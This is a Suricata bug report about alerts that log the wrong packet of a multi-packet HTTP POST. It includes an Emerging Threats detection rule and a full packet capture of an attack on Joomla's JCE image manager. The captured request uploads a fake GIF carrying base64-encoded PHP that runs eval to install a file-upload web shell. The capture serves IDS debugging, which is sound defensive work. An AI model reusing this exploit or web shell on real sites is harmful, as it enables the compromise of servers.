Bug #810
Updated by Victor Julien almost 11 years ago
At multiple sites I am running Suricata 1.4.1 on 64 bit Ubuntu 12.04 and CentOS 6 with PF_RING, and I am frequently running into this problem.
It appears that when an HTTP request spanning multiple packets (like an HTTP POST with the POST data spilling over into a second packet), triggers an IDS alert, that frequently the wrong packet gets stuffed into the payload field of the unified2 file for that event, such that looking at the stored event I cannot find the substring that the firing rule was looking for.
For example, I just has this rule fire at two different sites running Suricata (versions 1.4 and 1.4.1).
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET CURRENT_EVENTS JCE Joomla Scanner"; flow:established,to_server; content:"User-Agent|3a| BOT/0.1 (BOT for JCE)"; http_header; classtype:web-application-attack; sid:2016032; rev:1;)
In both cases an HTTP POST spread across two packets is involved. The substring matched by the rule is in the 1st packet, but only the second packet is recorded as the payload.
When a multi-packet HTTP request is made, I'd personally like to see the whole thing merged together into a single data payload to be inserted into the NIDS event. Or if that isn't reasonable, at least stash the same packet that actually matched the rule.
T 95.173.183.22:2472 -> 172.21.1.143:80 [A]
<pre>
POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1.
Host: www.scriptsource.org.
User-Agent: BOT/0.1 (BOT for JCE).
Content-Type: multipart/form-data; boundary=---------------------------41184676334.
Accept-Language: en-us,en;q=0.5.
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7.
Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none).
Connection: Close.
Proxy-Connection: close.
Content-Length: 1337.
.
.
.
-----------------------------41184676334.
Content-Disposition: form-data; name="upload-dir".
.
/.
-----------------------------41184676334.
Content-Disposition: form-data; name="Filedata"; filename="".
Content-Type: application/octet-stream.
.
.
-----------------------------41184676334.
Content-Disposition: form-data; name="upload-overwrite".
.
0.
-----------------------------41184676334.
Content-Disposition: form-data; name="Filedata"; filename="mua.gif".
Content-Type: image/gif.
.
GIF89a1
<?php eval("?>".base64_decode("PGh0bWw+IENvZGVkIEJ5IE11YSAmIEtlcmVzdGVjaTxicj4NCjw/IA0KLyogQ29kZWQgQnkgTXVhICYgS2VyZXN0ZWNpICovDQplY2hvICc
</pre>
T 95.173.183.22:2472 - > 172.21.1.143:80 [AP]
<pre>
8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOw0KZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7DQppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+dXN0YSB1cGxvYWQgYmFzYXJpbGk8L2I+PGJyPjxicj4nOyB9DQp9DQo/PjwvaHRtbD4=")); ?>.
-----------------------------41184676334.
0day.
-----------------------------41184676334.
Content-Disposition: form-data; name="action".
.
upload.
-----------------------------41184676334--.
.
.
.
</pre>